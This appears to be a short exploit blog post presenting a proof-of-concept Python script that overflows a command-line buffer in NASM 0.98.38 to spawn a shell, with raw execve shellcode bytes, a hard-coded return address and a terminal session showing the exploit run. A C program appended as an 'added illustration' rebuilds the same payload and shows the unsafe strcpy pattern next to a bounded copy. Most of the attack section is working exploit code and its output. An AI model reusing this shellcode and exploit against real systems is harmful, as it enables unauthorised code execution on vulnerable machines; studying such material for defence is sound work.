As before, I wrote another PoC that gets a shell through a buffer overflow in an old NASM (0.98.38). The payload is passed as a single over-long command-line argument: filler, then shellcode, then a hard-coded stack address that overwrites the saved return address.
Check it out:
reader@hacking:~/src/COREs $ vim nasmsh.py
---<code>---
#!/usr/bin/env python
# -------------------------
# 0day poc for nasm 0.98.38
# 28.04.2015
from subprocess import call

flex = '/usr/bin/nasm'

# execve("/bin//sh", ...) followed by exit(); contains no NUL byte,
# so it survives being passed through argv (bytes literal: works on
# Python 2 and 3, a str would get re-encoded on Python 3)
shellcode = b"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e"
shellcode += b"\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80"

# filler up to the saved return address; 'A' (0x41) decodes as
# "inc ecx" on x86, so it also works as a sled
nops = b"A" * 4076
# saved EIP is overwritten with 0xbffffb6c (little-endian), a stack
# address found for this box; only valid without ASLR and with the
# same environment/argv layout, so adjust it if no shell spawns
ret = b"\x6c\xfb\xff\xbf"

payload = nops + shellcode + ret
call([flex, payload])
print('Done\n\n')
---<code>---
reader@hacking:~/src/COREs $ chmod u+x nasmsh.py
reader@hacking:~/src/COREs $ nasm -v
NASM version 0.98.38 compiled on Jun 27 2005
reader@hacking:~/src/COREs $ sh
sh-3.2$ ./nasmsh.py
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.
reader@hacking:/home/reader/src/COREs $ exit
exit
Done
sh-3.2$
---
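As an added illustration (not code from this post, and not NASM's own source): a small C program standing in for the argv-to-stack-buffer overflow pattern the PoC abuses, the bounded copy that closes it, and the two checks a payload delivered through argv has to pass, namely the filler | shellcode | return-address layout and the absence of NUL bytes, since argv entries are C strings. BUF_SIZE, the function names and the buffer sizes are assumptions for the illustration; the shellcode bytes, the 4076-byte filler and the return address 0xbffffb6c are the ones nasmsh.py uses.

```c
/* Added example, not code from the post: a stand-in for the argv-to-stack
 * overflow pattern the PoC abuses, the bounded copy that closes it, and the
 * checks a payload delivered through argv must pass. BUF_SIZE, the function
 * names and the sizes are assumptions for this illustration, not NASM's
 * real code. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define BUF_SIZE 4076   /* assumed: sized to the PoC's 4076-byte filler */

/* Shellcode taken from the PoC: execve("/bin//sh", ...) then exit(). */
static const unsigned char shellcode[] =
    "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e"
    "\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80";
#define SHELLCODE_LEN (sizeof(shellcode) - 1)   /* 28, string NUL excluded */

/* Vulnerable pattern: fixed-size stack buffer, unbounded copy from argv.
 * Anything of BUF_SIZE bytes or more runs past buf into the saved frame
 * pointer and return address. Never call this with the payload. */
size_t parse_arg_unsafe(const char *arg) {
    char buf[BUF_SIZE];
    strcpy(buf, arg);                 /* no length check */
    return strlen(buf);
}

/* Would parse_arg_unsafe() overflow on this argument? */
int arg_overflows(const char *arg) {
    return strlen(arg) >= BUF_SIZE;   /* >= because of the terminating NUL */
}

/* Hardened form: check the length first and refuse over-long input
 * outright instead of truncating silently. Returns 0 on success, -1 if
 * the argument does not fit. */
int parse_arg_safe(char *dst, size_t dstsz, const char *arg) {
    size_t n = strlen(arg);
    if (n >= dstsz)
        return -1;
    memcpy(dst, arg, n + 1);          /* n + 1 copies the NUL too */
    return 0;
}

/* Builds filler | shellcode | return address with the PoC's layout.
 * The filler is 'A' (0x41), which x86 decodes as "inc ecx", so it doubles
 * as a sled; the shellcode zeroes ecx itself. The address is written
 * little-endian. Returns the payload length, or -1 if out is too small.
 * A trailing NUL is added so the buffer can be handed to C string calls. */
int build_payload(unsigned char *out, size_t outsz, size_t filler_len, uint32_t ret) {
    size_t total = filler_len + SHELLCODE_LEN + 4;
    if (total + 1 > outsz)
        return -1;
    memset(out, 'A', filler_len);
    memcpy(out + filler_len, shellcode, SHELLCODE_LEN);
    out[total - 4] = (unsigned char)(ret & 0xff);
    out[total - 3] = (unsigned char)((ret >> 8) & 0xff);
    out[total - 2] = (unsigned char)((ret >> 16) & 0xff);
    out[total - 1] = (unsigned char)((ret >> 24) & 0xff);
    out[total] = '\0';
    return (int)total;
}

/* argv entries are C strings: a NUL byte anywhere cuts the payload short
 * before execve() ever hands it to the target, so both the shellcode and
 * the return address must be NUL-free. */
int payload_is_argv_safe(const unsigned char *p, size_t n) {
    return memchr(p, 0, n) == NULL;
}

int main(void) {
    unsigned char payload[8192];
    char buf[BUF_SIZE];
    int n = build_payload(payload, sizeof payload, 4076, 0xbffffb6cu);

    printf("payload: %d bytes, NUL-free: %s, overflows unsafe parser: %s\n",
           n, payload_is_argv_safe(payload, (size_t)n) ? "yes" : "no",
           arg_overflows((const char *)payload) ? "yes" : "no");
    printf("bounded parser: %s\n",
           parse_arg_safe(buf, sizeof buf, (const char *)payload) == 0
               ? "accepted" : "rejected (too long)");
    return 0;
}
```

The program only builds and inspects the payload as data, so it runs unchanged on a 64-bit host; the hard-coded 0xbffffb6c is still only meaningful on a 32-bit, non-ASLR stack like the one in the session above, and it shifts with the environment size and argv layout, which is why a one-off stack address from another box rarely works as is.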
Cheers
o/